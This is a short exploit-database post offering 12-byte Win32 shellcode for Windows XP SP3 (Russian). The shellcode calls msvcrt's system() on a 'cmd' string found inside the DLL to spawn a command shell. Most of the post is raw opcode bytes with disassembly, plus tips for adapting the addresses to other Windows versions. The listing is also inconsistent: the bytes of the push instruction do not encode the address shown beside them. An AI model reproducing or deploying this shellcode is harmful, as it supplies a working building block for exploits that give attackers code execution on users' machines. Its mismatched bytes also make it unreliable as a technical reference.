============================================================ win32/xp sp3 (Ru) WinExec+ExitProcess cmd shellcode 12 bytes ============================================================ Thanks to last cotribution to inj3ct0r.com (WinExec+ExitProcess in 16 bytes). o-o-o-o-o-o-o-o-o-o-o-o-o-o Inj3ct0r Exploit Database My id: http://inj3ct0r.com/author/2274 Original: http://inj3ct0r.com/exploits/11432 o-o-o-o-o-o-o-o-o-o-o-o-o-o Especially for Inj3ct0r.com 68 9D 61 F9 77 push 0x77C01345 B8 C7 93 C1 77 mov eax,msvcrt.system FF D0 call eax In msvcrt.dll at 0x77C01344 We have string ".cmd", that's the trick. Code will work in WinXP SP3 Pro Rus, in other versions you'd better search the string and system(char*) address for yourself. Coded via lord Kelvin. # Inj3ct0r.com [2010-03-24]